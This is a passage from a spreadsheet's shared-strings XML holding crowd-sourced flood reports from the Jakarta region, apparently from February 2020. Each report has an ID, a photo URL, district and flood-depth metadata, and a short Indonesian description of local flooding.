    <t>bbbfa4d0-ce41-4313-997b-2ef494d1f0b6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bbbfa4d0-ce41-4313-997b-2ef494d1f0b6.jpg</t>
  </si>
  <si>
    <t>Grenvil Blok BB mulai terendam biasanya di luar komplek minimal 15cm</t>
  </si>
  <si>
    <t>8e5d4775-5423-4364-8f1b-6c263559ba95</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8e5d4775-5423-4364-8f1b-6c263559ba95.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "754", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir kramat sawah, sentiong, kawi kawi lebih dalam lagi</t>
  </si>
  <si>
    <t>4dc94c0b-8194-4ece-819f-ddc2a2e399ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4dc94c0b-8194-4ece-819f-ddc2a2e399ee.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2683", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kondisi di dalem rumah.... Pesing koneng rt 10 / 02. Kelurahan : Kedoya Utara. Kecamatan : kebun jeruk</t>
  </si>
  <si>
    <t>43751ae7-5211-463c-a89c-a74c5203a305</t>
  </si>
  <si>
    <t>https://images.petabencana.id/43751ae7-5211-463c-a89c-a74c5203a305.jpg</t>
  </si>
  <si>
    <t>0fe48305-92f7-40e1-837e-4b46b62d749f</t>
  </si>
  <si>
    <t>Akses jalan depan komplek bumi nasio indah tertutup air</t>
  </si>
  <si>
    <t>ec70d328-75f9-4310-8bd2-63bd3130229c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ec70d328-75f9-4310-8bd2-63bd3130229c.jpg</t>
  </si>
  <si>
    <t>b7b9ab28-7c97-4313-bdf1-1dc1fc1ff530</t>
  </si>
  <si>
    <t>Komplek taman cipulir estate, banjir sebetis di dalam rumah namun sudah berangsur surut</t>
  </si>
  <si>
    <t>Cipadu Jaya</t>
  </si>
  <si>
    <t>e7300c18-7e09-4071-bf92-2a9b25aaf9cc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e7300c18-7e09-4071-bf92-2a9b25aaf9cc.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1981", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl Surilang, Gedong, Pasar Rebo</t>
  </si>
  <si>
    <t>Gedong</t>
  </si>
  <si>
    <t>Pasar Rebo</t>
  </si>
  <si>
    <t>1ac3b9d3-61f5-4457-87f8-00f5676b7218</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ac3b9d3-61f5-4457-87f8-00f5676b7218.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2277", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ebeb8721-1070-4c76-a395-f92e44a9d112</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ebeb8721-1070-4c76-a395-f92e44a9d112.jpg</t>
  </si>
  <si>
    <t>e7c60ad4-587f-469f-8e99-ff3d2412cfe7</t>
  </si>
  <si>
    <t>{ "points": 4, "flood_depth": 38, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Jalan HR Rasuna sementara tidak bisa dilalui</t>
  </si>
  <si>
    <t>4cbed255-5cbe-4f46-81f8-97425a769721</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4cbed255-5cbe-4f46-81f8-97425a769721.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1138", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air terus menambah ketinggian, butuh bantuan bahan pangan dan obat2an dll</t>
  </si>
  <si>
    <t>430a7cef-8deb-4902-ad8c-6296667e907f</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "838", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir aliran sungai</t>
  </si>
  <si>
    <t>40e2cc31-b40c-49ed-b346-da1b2fbfa3b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/40e2cc31-b40c-49ed-b346-da1b2fbfa3b2.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 54, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "32", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>848ec027-b6a3-4793-b40b-bd42c8dd559e</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 109, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Pulomas raya banjir akses ke dan dari pulomas tidak bisa lewat</t>
  </si>
  <si>
    <t>518ac4a9-57cd-4e21-a246-34333e4bd906</t>
  </si>
  <si>
    <t>https://images.petabencana.id/518ac4a9-57cd-4e21-a246-34333e4bd906.jpg</t>
  </si>
  <si>
    <t>Banjir sampai betis</t>
  </si>
  <si>
    <t>833658e4-cce5-4350-b352-50ff54d6e3a4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/833658e4-cce5-4350-b352-50ff54d6e3a4.jpg</t>
  </si>
  <si>
    <t>Belakang Mal Ciputra, Jalan Taman Daan Mogot Raya, RT002,RW001, Tanjung Duren Utara, Grogol Petamburan,Jakarta Barat</t>
  </si>
  <si>
    <t>bfe7d79b-3fd0-490b-b91a-692dc1fe82c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bfe7d79b-3fd0-490b-b91a-692dc1fe82c9.jpg</t>
  </si>
  <si>
    <t>Keadaan saat ini 08:22 , perumahan Trias estate Blok B1 no 02. Tambun - Bekasi</t>
  </si>
  <si>
    <t>e6d8252f-0d3b-432c-83c7-ce3b0ffa96ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e6d8252f-0d3b-432c-83c7-ce3b0ffa96ea.jpg</t>
  </si>
  <si>
    <t>Di depan rumah sudah se betis orang dewasa</t>
  </si>
  <si>
    <t>bee7d897-0344-4dcc-b9dc-a16c4a8b2fa3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bee7d897-0344-4dcc-b9dc-a16c4a8b2fa3.jpg</t>
  </si>
  <si>
    <t>df06e30a-a94a-4d71-b9ad-7b515d4d5c8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/df06e30a-a94a-4d71-b9ad-7b515d4d5c8c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1557", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Lubang Buaya</t>
  </si>
  <si>
    <t>c894b2db-4ea6-4655-82a4-7e90dc4a7893</t>
  </si>
  <si>
    <t>Danau Sunter Dll</t>
  </si>
  <si>
    <t>940046f0-3204-40f1-9588-b4cb2122ce8e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/940046f0-3204-40f1-9588-b4cb2122ce8e.jpg</t>
  </si>
  <si>
    <t>d29294a0-3457-4eea-9db6-20950c78b439</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1522", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di gang Umi bawah. Air sudah masuk ke rumah warga</t>
  </si>
  <si>
    <t>153c9cbc-cf2f-4890-8c40-052d5617ce7a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/153c9cbc-cf2f-4890-8c40-052d5617ce7a.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 73, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir Melumpukan akses jalan</t>
  </si>
  <si>
    <t>16bd6868-7970-4efe-85be-d692b57d9693</t>
  </si>
  <si>
    <t>https://images.petabencana.id/16bd6868-7970-4efe-85be-d692b57d9693.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1156", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Bangka raya dekat bangka V belum banjir</t>
  </si>
  <si>
    <t>9d681c44-40ab-4ac9-9e45-b74aed1a68a5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9d681c44-40ab-4ac9-9e45-b74aed1a68a5.jpg</t>
  </si>
  <si>
    <t>Jl. Raden fatah ciledug</t>
  </si>
  <si>
    <t>a08a0f8a-16b5-431d-9b6d-62ffafba3a32</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a08a0f8a-16b5-431d-9b6d-62ffafba3a32.jpg</t>
  </si>
  <si>
    <t>Banjir 50-60 cm, kali meluap, padahal dr tahun baru tidak banjir</t>
  </si>
  <si>
    <t>d78de379-6259-446c-abdd-5347b551c8da</t>
  </si>
  <si>
    <t>Posisi jalan tergenang</t>
  </si>
  <si>
    <t>1a46c746-8d57-405a-a915-d3c916e41146</t>
  </si>
  <si>
    <t>df9c2a22-9d35-4ed1-bf1a-ac32b8f3ab3c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/df9c2a22-9d35-4ed1-bf1a-ac32b8f3ab3c.jpg</t>
  </si>
  <si>
    <t>Banjir di kawasan daerah perumahan citra villa wanasari cibitung kab. Bekasi 25 febuari 2020 pukul 08.26 pagi"</t>
  </si>
  <si>
    <t>120fb8b3-9a7e-4f24-91f1-88fa31471b83</t>
  </si>
  <si>
    <t>https://images.petabencana.id/120fb8b3-9a7e-4f24-91f1-88fa31471b83.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1805", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>6bece762-b0a2-4722-a2e4-6c9304829e7a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6bece762-b0a2-4722-a2e4-6c9304829e7a.jpg</t>
  </si>
  <si>
    <t>Banjir di Taman Harapan Baru, blok ABCD, Bekasi</t>
  </si>
  <si>
    <t>37e6ce4e-b246-473f-be5c-26f125e16977</t>
  </si>
  <si>
    <t>https://images.petabencana.id/37e6ce4e-b246-473f-be5c-26f125e16977.jpg</t>
  </si>
  <si>
    <t>Banjir di Komplek Kejaksaan Agung, Kel. Kayuringin Jaya, Bekasi</t>
  </si>
  <si>
    <t>d3ac0f2e-6c98-4742-8c33-a2f83994d18d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d3ac0f2e-6c98-4742-8c33-a2f83994d18d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "578", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>49334c89-ded1-4199-89c4-a9567486b860</t>
  </si>
  <si>
    <t>https://images.petabencana.id/49334c89-ded1-4199-89c4-a9567486b860.jpg</t>
  </si>
  <si>
    <t>Sudah masuk rumah sampai atas mata kaki</t>
  </si>
  <si>
    <t>38d9f357-4995-44da-afeb-2df376b03ead</t>
  </si>
  <si>
    <t>https://images.petabencana.id/38d9f357-4995-44da-afeb-2df376b03ead.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1260", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir jl amil dekat jalan warung buncit</t>
  </si>
  <si>
    <t>397130ff-fc1f-4d9d-866e-a43cf8f7a725</t>
  </si>
  <si>
    <t>https://images.petabencana.id/397130ff-fc1f-4d9d-866e-a43cf8f7a725.jpg</t>
  </si>
  <si>
    <t>35ac8d93-26b0-4ec4-823f-3a396ecff002</t>
  </si>
  <si>
    <t>https://images.petabencana.id/35ac8d93-26b0-4ec4-823f-3a396ecff002.jpg</t>
  </si>
  <si>
    <t>Bekasi barat banjir</t>
  </si>
  <si>
    <t>0cf040a4-1a8f-4403-8009-41cf6229aa68</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0cf040a4-1a8f-4403-8009-41cf6229aa68.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2693", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>belum surut</t>
  </si>
  <si>
    <t>3c19a08f-2af0-4d2d-bf02-4e252261f042</t>
  </si>
  <si>
    <t>Taman Ratu, Duri Kepa</t>
  </si>
  <si>
    <t>bfaa93bf-3ca6-4f5d-b031-55e8bbeeaefc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bfaa93bf-3ca6-4f5d-b031-55e8bbeeaefc.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 97, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2676", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>80b83992-ee3f-4575-9520-b5623718af79</t>
  </si>
  <si>
    <t>https://images.petabencana.id/80b83992-ee3f-4575-9520-b5623718af79.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 139 }</t>
  </si>
  <si>
    <t>Komplek Dosen IKIP banjir Besar</t>
  </si>
  <si>
    <t>c8ee778b-c2ed-4aeb-b668-e57ee6830c1b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c8ee778b-c2ed-4aeb-b668-e57ee6830c1b.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 20, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Grenvil blok BC saat ini sekitar 20cm</t>
  </si>
  <si>
    <t>2979aa17-9477-4118-be17-a5b3371d0e40</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2979aa17-9477-4118-be17-a5b3371d0e40.jpg</t>
  </si>
  <si>
    <t>Eramas 2000, banjir sepinggang, 80 cm</t>
  </si>
  <si>
    <t>77f2d3c6-3ff6-4917-9d1c-2252b800d271</t>
  </si>
  <si>
    <t>https://images.petabencana.id/77f2d3c6-3ff6-4917-9d1c-2252b800d271.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1117", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>1a80b48f-e75f-4c6b-b853-61560d6d039a</t>
  </si>
  <si>
    <t>Pintu air peninggilan</t>
  </si>
  <si>
    <t>73a9ca3b-8b07-4508-bb62-138e0fac909e</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 52, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Alpukat 2</t>
  </si>
  <si>
    <t>65896846-565f-4ef0-a68b-1a1b70cfd9dc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/65896846-565f-4ef0-a68b-1a1b70cfd9dc.jpg</t>
  </si>
  <si>
    <t>d63bc6b3-56c1-40ee-9982-a3fc166f4328</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d63bc6b3-56c1-40ee-9982-a3fc166f4328.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 110 }</t>
  </si>
  <si>
    <t>Lokasi Levis jalan pisangan satriamekar kec. Tambun utara kab. Bekasi</t>
  </si>
  <si>
    <t>47f9c155-d8df-4840-baa9-66b61c6b68ab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/47f9c155-d8df-4840-baa9-66b61c6b68ab.jpg</t>
  </si>
  <si>
    <t>Eramas 2000, meranti , banjir 50-60cm</t>
  </si>
  <si>
    <t>b5e0aa7d-f32d-4713-abab-c6e83d03ea06</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b5e0aa7d-f32d-4713-abab-c6e83d03ea06.jpg</t>
  </si>
  <si>
    <t>Kalimalang, Jatiwaringin duren sawit, jam 8.37 masih banjir, sudah sempat surut sedikit, namun sekarang hujan kembali</t>
  </si>
  <si>
    <t>edc99114-98ba-47bb-80d1-c24c157e88f5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/edc99114-98ba-47bb-80d1-c24c157e88f5.jpg</t>
  </si>
  <si>
    <t>d3d52a80-7a4d-46cd-a61e-377481c6b0f4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d3d52a80-7a4d-46cd-a61e-377481c6b0f4.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 45, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Benyamin sueb</t>
  </si>
  <si>
    <t>5e59b79f-743d-4089-862f-78ddfab0d0f5</t>
  </si>
  <si>
    <t>Banjir depan Mall Kelapa Gading (MKG). Tinggi hampir selutut/selevel knalpot motor.</t>
  </si>
  <si>
    <t>7aa69fcd-c584-406a-9c02-61dbbe26701e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7aa69fcd-c584-406a-9c02-61dbbe26701e.jpg</t>
  </si>
  <si>
    <t>banjir dikawasana mall ciputra</t>
  </si>
  <si>
    <t>84a9c917-7914-422f-8d81-3dfd86d44e8f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/84a9c917-7914-422f-8d81-3dfd86d44e8f.jpg</t>
  </si>
  <si>
    <t>Komplek dosen ikip</t>
  </si>
  <si>
    <t>1ea214b6-7885-40d1-b1ae-1629e52c3b1d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ea214b6-7885-40d1-b1ae-1629e52c3b1d.jpg</t>
  </si>
  <si>
    <t>Banjir sejak sekitar Pk 04.30 semakin naik.</t>
  </si>
  <si>
    <t>2627b9fa-1149-4db4-ae16-da41b84904c2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2627b9fa-1149-4db4-ae16-da41b84904c2.jpg</t>
  </si>
  <si>
    <t>Air tergenang setinggi betis orang dewasa</t>
  </si>
  <si>
    <t>3a9a0d36-732c-4cb9-bf7e-47a42e90717c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3a9a0d36-732c-4cb9-bf7e-47a42e90717c.jpg</t>
  </si>
  <si>
    <t>Greenville blok BE. Sekitar 25cm</t>
  </si>
  <si>
    <t>d91ec7da-53a5-4714-86e3-3e77587eb6ff</t>
  </si>
  <si>
    <t>dari tadi dilaporkan 40 cm, sekarang sudah naik jadi 60 cm (lebih dari dengkul)</t>
  </si>
  <si>
    <t>c7ffa04f-990b-4142-b479-80f4171aecf2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c7ffa04f-990b-4142-b479-80f4171aecf2.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "86", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kalideres</t>
  </si>
  <si>
    <t>c3e9de24-f583-4950-85ea-58226a017b66</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c3e9de24-f583-4950-85ea-58226a017b66.jpg</t>
  </si>
  <si>
    <t>ac1e2548-730d-4d04-bddc-742256a5bfa9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ac1e2548-730d-4d04-bddc-742256a5bfa9.jpg</t>
  </si>
  <si>
    <t>Banjir di dalam dan depan komplek perumahan Setu Indah, jalanan ditutup</t>
  </si>
  <si>
    <t>d38098c8-b9c4-4ab9-96ed-51fde9d981fa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d38098c8-b9c4-4ab9-96ed-51fde9d981fa.jpg</t>
  </si>
  <si>
    <t>Komp. DEPDAGRI karang Tengah Tangerang, kondisi banjir setinggi dibawah lutut</t>
  </si>
  <si>
    <t>Meruya Selatan</t>
  </si>
  <si>
    <t>e7491290-51a3-430e-b79a-89423c3ddc21</t>
  </si>
  <si>
    <t>Bajir</t>
  </si>
  <si>
    <t>090ef6f9-0328-4a11-a3d8-0ae9818c2dc2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/090ef6f9-0328-4a11-a3d8-0ae9818c2dc2.jpg</t>
  </si>
  <si>
    <t>Banjir 30-60 cm Jalan Sungai Kampar Raya Semper Barat"</t>
  </si>
  <si>
    <t>2f2f3ed7-5858-4a9d-b636-49a504655901</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2f2f3ed7-5858-4a9d-b636-49a504655901.jpg</t>
  </si>
  <si>
    <t>Banjir sebetis orang dewasa. Diperkirakan akan segera surut.</t>
  </si>
  <si>
    <t>c5967b25-cdd6-41b7-b600-3c5725da38c0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c5967b25-cdd6-41b7-b600-3c5725da38c0.jpg</t>
  </si>
  <si>
    <t>tambun utara grand permata residence blok m12 sangat mudah terkena banjir karena drainase yang buruk dan adanya danau yang tidak terawat</t>
  </si>
  <si>
    <t>Samudrajaya</t>
  </si>
  <si>
    <t>c2b3cf1b-4d19-4ac3-a49e-e21972826b7a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c2b3cf1b-4d19-4ac3-a49e-e21972826b7a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "818", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Depan SDIT alkhairot jam 6.30 pagi</t>
  </si>
  <si>
    <t>Batu Ampar</t>
  </si>
  <si>
    <t>b16c0724-8c88-4ab2-8c7d-8c146fc37a2a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b16c0724-8c88-4ab2-8c7d-8c146fc37a2a.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 108 }</t>
  </si>
  <si>
    <t>Rumah bapak subur jalan pisangan satriamekar kec. Tambun utara.. Posisi sebelah darmawangsa residence tambun utara</t>
  </si>
  <si>
    <t>c613ded2-55b6-4239-8d45-d9479b2af890</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c613ded2-55b6-4239-8d45-d9479b2af890.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi 50 cm saat ini, sebelumnya 70 cm. Di jalan subur raya Kel Menteng atas kec Setiabudi Jakarta selatan</t>
  </si>
  <si>
    <t>a6c6d2f2-040c-4c09-aad0-863c20451874</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a6c6d2f2-040c-4c09-aad0-863c20451874.jpg</t>
  </si>
  <si>
    <t>Depan apartemen mediterania boulevard</t>
  </si>
  <si>
    <t>bc55a33d-0bba-4658-a3d3-a8bd95dce5ae</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2568", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>air naik terus</t>
  </si>
  <si>
    <t>aa876b44-2db8-4bbb-b2b6-aa3e44d4ae0f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aa876b44-2db8-4bbb-b2b6-aa3e44d4ae0f.jpg</t>
  </si>
  <si>
    <t>jalan mawar gg. swadaya. duta kranji bekasi barat</t>
  </si>
  <si>
    <t>1fa20e68-3716-4552-a4bd-00ef3e56cbf5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1fa20e68-3716-4552-a4bd-00ef3e56cbf5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1842", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>RW 006 Kel. Tengah, 30cm</t>
  </si>
  <si>
    <t>98ef6125-619c-4e48-b941-347300e4fcbc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/98ef6125-619c-4e48-b941-347300e4fcbc.jpg</t>
  </si>
  <si>
    <t>Pejaten Indah banjir sampai paha</t>
  </si>
  <si>
    <t>e0660a18-9f6f-4757-965a-e451a4aee8cf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e0660a18-9f6f-4757-965a-e451a4aee8cf.jpg</t>
  </si>
  <si>
    <t>Perumahan Taman Galaxy</t>
  </si>
  <si>
    <t>832eae9c-3524-4044-a486-d902962284ea</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2486", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pejaten Timur</t>
  </si>
  <si>
    <t>f96ac803-078e-40c2-88ec-43ebbeab6c81</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f96ac803-078e-40c2-88ec-43ebbeab6c81.jpg</t>
  </si>
  <si>
    <t>Banjiiirrr</t>
  </si>
  <si>
    <t>57beafa0-6397-42cd-a57a-3566e715db5d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/57beafa0-6397-42cd-a57a-3566e715db5d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "698", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>03f96085-251d-422d-8957-0494772bec7b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/03f96085-251d-422d-8957-0494772bec7b.jpg</t>
  </si>
  <si>
    <t>Tanjung Duren 250220</t>
  </si>
  <si>
    <t>20f32760-a3f5-4674-86f9-931be052c05e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/20f32760-a3f5-4674-86f9-931be052c05e.jpg</t>
  </si>
  <si>
    <t>Deket belakang gereja hkbp</t>
  </si>
  <si>
    <t>c77b3c66-3504-46d8-b80a-91a2b1d25b0e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c77b3c66-3504-46d8-b80a-91a2b1d25b0e.jpg</t>
  </si>
  <si>
    <t>910d5068-4271-4ad1-b739-11de196804ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/910d5068-4271-4ad1-b739-11de196804ea.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 86, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1898", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kondisi Terkini Dari Arah Kampung Melayu Dan Seterusnya, Tidak Bisa Dilalui Oleh Kendaraan Umum. Dikarenakan Masih Ada Banjir</t>
  </si>
  <si>
    <t>844c7fe9-c339-4953-9c8c-2181c13b2e2c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/844c7fe9-c339-4953-9c8c-2181c13b2e2c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "762", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>b405ae15-b770-40f7-a5d3-ca36b4b26902</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b405ae15-b770-40f7-a5d3-ca36b4b26902.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2446", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Petamburan V</t>
  </si>
  <si>
    <t>Petamburan</t>
  </si>
  <si>
    <t>74d560a2-eecd-4c88-b3a6-ffc05ee53aaf</t>
  </si>
  <si>
    <t>Jalan Raya Padat.. daerah gang sekitar jalan raya banjir</t>
  </si>
  <si>
    <t>1126052b-3643-49a6-b8e0-621128b91da1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1126052b-3643-49a6-b8e0-621128b91da1.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 137, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2447", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Petamburan 2, mohon bantuannya, airnya disurut kan, kasian warga Petamburan 2 banjir melulu</t>
  </si>
  <si>
    <t>e5720474-b76d-4c07-a029-9e65d59e3325</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e5720474-b76d-4c07-a029-9e65d59e3325.jpg</t>
  </si>
  <si>
    <t>Perumahan Setu Indah</t>
  </si>
  <si>
    <t>feff209f-1edb-4cd8-8cdb-667fdb00725d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/feff209f-1edb-4cd8-8cdb-667fdb00725d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "1034", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>kebon sirih barat I (gang nasgor kambing).</t>
  </si>
  <si>
    <t>3b0285b2-1e8b-488e-8ed2-ce20592a3ce3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3b0285b2-1e8b-488e-8ed2-ce20592a3ce3.jpg</t>
  </si>
  <si>
    <t>7fe77d52-bb54-459d-a30d-547a4044ef21</t>
  </si>
  <si>
    <t>DHI banjir 80-100cm</t>
  </si>
  <si>
    <t>02491e99-826e-4f3a-ad39-cbce71ae5f9a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/02491e99-826e-4f3a-ad39-cbce71ae5f9a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2529", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Depan Apartemen Gading Nias</t>
  </si>
  <si>
    <t>ef43e527-bcf7-4800-b30d-a11e89e9375e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ef43e527-bcf7-4800-b30d-a11e89e9375e.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 19, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1135", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>98d87b93-397b-4aea-81bc-b4b881578c5a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/98d87b93-397b-4aea-81bc-b4b881578c5a.jpg</t>
  </si>
  <si>
    <t>Perumahan Cipinang Indah 2, Jakarta Timur</t>
  </si>
  <si>
    <t>5c6b2c37-8639-4127-878f-2e15f0218d63</t>
  </si>
  <si>
    <t>a5a6ffde-935e-4dcc-93d7-4772f581a549</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a5a6ffde-935e-4dcc-93d7-4772f581a549.jpg</t>
  </si>
  <si>
    <t>Sbrang gereja ayam</t>
  </si>
  <si>
    <t>1f834b50-7a90-4eb3-a6fc-d65881fe1ca7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1f834b50-7a90-4eb3-a6fc-d65881fe1ca7.jpg</t>
  </si>
  <si>
    <t>Jalan pisangan satriamekar kec. Tambun utara kab. Bekasi.</t>
  </si>
  <si>
    <t>Satriamekar</t>
  </si>
  <si>
    <t>dcb24ece-c236-4560-98d0-6794388683dd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dcb24ece-c236-4560-98d0-6794388683dd.jpg</t>
  </si>
  <si>
    <t>Banjir nya gk ketulungan dri lanpu merah citra sampe ke bunderan 4 di tutup jalannya</t>
  </si>
  <si>
    <t>c67c4b07-6a4f-436d-b2ca-d99e075e6825</t>
  </si>
